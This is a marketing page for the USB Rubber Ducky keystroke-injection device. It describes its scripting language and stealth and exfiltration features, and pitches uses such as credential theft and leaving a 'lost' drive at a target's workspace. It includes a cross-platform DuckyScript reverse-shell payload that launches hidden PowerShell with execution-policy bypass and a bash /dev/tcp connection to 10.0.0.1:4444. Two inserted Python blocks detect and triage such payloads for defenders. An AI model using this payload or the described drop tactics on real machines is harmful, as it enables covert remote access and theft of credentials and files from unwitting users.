Rubber Ducky

The Original Keystroke Injection Tool

The device that invented the keystroke injection attack. Looks like a flash drive, types like a keyboard, executes payloads at over 1000 words per minute. A hacker culture icon since 2010.

KEYSTROKE INJECTION | DUCKYSCRIPT™ 3.0 | USB-C + USB-A | HID EMULATION | MICROSD | CROSS-PLATFORM

Computers Trust Keyboards. Period.

Every computer inherently trusts USB Human Interface Devices. A keyboard says "I'm a keyboard" and the OS accepts it — no drivers, no prompts, no questions. The USB Rubber Ducky exploits this universal trust by presenting itself as a trusted keyboard while executing pre-programmed payloads at superhuman speeds. From credential theft to reverse shells, if you can type it, the Ducky can do it — but in seconds, not minutes.

Humans (use keyboards) → TRUST → Keyboards (HID standard) → TRUST → Computers (auto-accept HID) ← EXPLOIT ← Rubber Ducky (looks like a flash drive)

1000+ WORDS / MINUTE
The Rubber Ducky types faster than any human. A payload that would take a person several minutes to type manually is executed in seconds — far too fast for anyone to react or intervene.

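An added example, not from the original page: a defender-side check built on the typing-speed claim above. It splits a stream of key-down timestamps into runs and flags any run faster than an assumed human ceiling; the timestamp source, the thresholds and the sample data are assumptions constructed for illustration.

```python
from statistics import median

CHARS_PER_WORD = 5      # usual words-per-minute convention
HUMAN_MAX_WPM = 250     # assumed ceiling for sustained human typing
MIN_BURST = 12          # keystrokes required before a run is judged
PAUSE_MS = 400          # a gap this long ends the current run

def run_wpm(run):
    """Typing rate implied by the median gap between key-down times (ms)."""
    gaps = [b - a for a, b in zip(run, run[1:])]
    gap = max(median(gaps), 1)          # clamp so identical timestamps stay finite
    return round(60_000 / (gap * CHARS_PER_WORD))

def find_injection_bursts(timestamps_ms):
    """Return (start_ms, end_ms, keystrokes, wpm) for runs typed faster than a human."""
    flagged, run = [], []
    for t in list(timestamps_ms) + [None]:      # None flushes the final run
        if run and (t is None or t - run[-1] > PAUSE_MS):
            if len(run) >= MIN_BURST and run_wpm(run) > HUMAN_MAX_WPM:
                flagged.append((run[0], run[-1], len(run), run_wpm(run)))
            run = []
        if t is not None:
            run.append(t)
    return flagged

# Constructed key-down timestamps in milliseconds (not captured from a device).
human = [i * 180 + (i % 3) * 25 for i in range(40)]             # about 60 WPM
injected = [15_000 + i * 12 for i in range(60)]                 # 12 ms gaps, 1000 WPM
paced = [40_000 + i * 110 + (i * 37) % 40 for i in range(60)]   # human-like delays

if __name__ == "__main__":
    print(find_injection_bursts(human + injected + paced))
```

The `paced` stream is not flagged, which matches the randomized-delay behaviour listed under Stealth Features. Timing is one detection layer, to be combined with USB device allow-listing and alerts on new HID enumeration.
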
A Hacker Culture Icon
2010 - Invention: Darren Kitchen creates keystroke injection at his IT job
2011 - Mark I: First USB Rubber Ducky with DuckyScript 1.0
2017 - Ecosystem: DuckyScript adopted by Bash Bunny, Key Croc, O.MG
2022 - Mark II: USB-C/A, DuckyScript 3.0, Keystroke Reflection

DuckyScript™ 3.0 Advanced

What started as three simple commands evolved into a full structured programming language — while staying simple enough to learn in minutes.

V1.0 (2010), Classic. Three commands: type, delay, keystroke. Simple macro language. Write a text file, encode, deploy.
V2.0 (2020), Extended. MATCH patterns, SAVEKEYS, multi-device support. Interpreted execution on Key Croc.
V3.0 (2022), Advanced. Variables, if/then, while loops, functions, randomization, extensions, OS detection, Keystroke Reflection.

Specifications
USB Interface: USB-C and USB-A connectors; desktop, laptop & mobile targets
Storage: MicroSD card slot; stores payloads + exfiltrated loot
Controls: Recessed button for arming mode; LED status indicator
Form Factor: Standard flash drive case; inconspicuous appearance
Compatibility: Windows, macOS, Linux, Android; any device with USB HID support
Attack Modes: HID (keyboard emulation); HID + STORAGE combined

Key Features
▸ Keystroke Injection — The attack Hak5 invented. Inject pre-programmed keystrokes at superhuman speed as a trusted HID device. Works on locked and unlocked targets.
▸ Keystroke Reflection — Revolutionary exfiltration pathway that evades endpoint restrictions, firewalls, and air-gaps. Data leaves through the keyboard channel itself.
▸ OS Detection — Payloads can automatically detect the target operating system and branch to platform-specific attack code. One payload, all platforms.
▸ Stealth Features — Mimic human typing cadence with randomized delays. File system spoofing hides loot and injection files. Detect storage activity to sense device inspection.
▸ Payload Studio — Full-featured web-based IDE with syntax highlighting, auto-complete, live error checking, and payload repository integration. Build and encode entirely in-browser.
▸ Extensions System — Reusable code blocks shared across payloads. The community contributes extensions that expand the language, abstracting complex tasks into simple calls.
▸ Programmable Button — BUTTON_DEF lets payloads assign custom functions to the physical button. Toggle between attack and arming modes, trigger multi-stage payloads, or abort.
▸ Hundreds of Payloads — Community-maintained Git repository with credential grabbers, reverse shells, exfiltration tools, pranks, and more. Backwards compatible with classic scripts.

Cross-Platform Reverse Shell

This DuckyScript 3.0 payload detects the target OS and launches the appropriate reverse shell — one payload for all platforms.

REM Cross-Platform Reverse Shell
REM Detects OS and adapts automatically

ATTACKMODE HID
DELAY 2000

REM Detect target OS
IF $_OS == WINDOWS THEN
  GUI r
  DELAY 500
  STRINGLN powershell -w hidden -ep bypass
  DELAY 1000
  STRINGLN $c=New-Object Net.Sockets.TCPClient('10.0.0.1',4444)
ELSE IF $_OS == MACOS THEN
  GUI SPACE
  DELAY 500
  STRINGLN Terminal
  DELAY 1000
  STRINGLN bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 &
ELSE
  CTRL ALT t
  DELAY 500
  STRINGLN bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 &
END_IF
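
An added example, not part of the original page or of Hak5 tooling: a static triage pass an incident responder could run over recovered DuckyScript source, such as the payload above, to list what each OS branch types and pull out network endpoints for hunting. The indicator patterns, the `triage` function name and the trimmed sample are constructed here.

```python
import re

# Patterns for the strings this page's payload types; extend for real triage.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "exec_policy_bypass": re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I),
    "dotnet_tcp_client": re.compile(r"Net\.Sockets\.TCPClient", re.I),
    "bash_dev_tcp": re.compile(r"/dev/tcp/"),
}
ENDPOINT = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})(?:'?\s*,\s*|/|:)(\d{1,5})")
BRANCH = re.compile(r"^(?:ELSE\s+)?IF\s+\(?\s*(.+?)\s*\)?\s+THEN$", re.I)

def triage(source):
    """Map each IF/ELSE branch to the indicators and host:port pairs it types."""
    report, branch = {}, "unconditional"
    for raw in source.splitlines():
        line = raw.strip()
        keyword = line.split(" ", 1)[0].upper()
        match = BRANCH.match(line)
        if match:
            branch = match.group(1)
        elif line.upper() == "ELSE":
            branch = "else"
        elif keyword == "END_IF":
            branch = "unconditional"
        elif keyword in ("STRING", "STRINGLN") and " " in line:
            typed = line.split(" ", 1)[1]
            entry = report.setdefault(branch, {"indicators": set(), "endpoints": set()})
            entry["indicators"] |= {n for n, p in INDICATORS.items() if p.search(typed)}
            entry["endpoints"] |= {(h, int(p)) for h, p in ENDPOINT.findall(typed)}
    return report

# Constructed sample: typed lines of the payload above, trimmed to two branches.
SAMPLE = """\
ATTACKMODE HID
IF $_OS == WINDOWS THEN
  STRINGLN powershell -w hidden -ep bypass
  STRINGLN $c=New-Object Net.Sockets.TCPClient('10.0.0.1',4444)
ELSE
  STRINGLN bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 &
END_IF
"""

if __name__ == "__main__":
    for name, found in triage(SAMPLE).items():
        print(name, sorted(found["indicators"]), sorted(found["endpoints"]))
```
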
Deployment Scenarios
Credential Theft: Open a hidden terminal, dump credentials, and exfiltrate via Keystroke Reflection — all before the user can react.
Reverse Shells: Establish persistent remote access in seconds. OS detection ensures the right shell command runs on any platform.
Social Engineering: Drop a "lost" flash drive in a target's workspace. When plugged in, the payload executes automatically with zero interaction.
Data Exfiltration: Use HID + STORAGE mode to silently copy target files to the Ducky's MicroSD while injecting cleanup commands.
IT Automation: Where the Ducky began — automating printer configs, network shares, and system maintenance. Let the Ducky do the typing.
Education: DuckyScript has been a cybersecurity gateway for hundreds of thousands of learners. Simple enough to learn in minutes, deep enough for advanced research.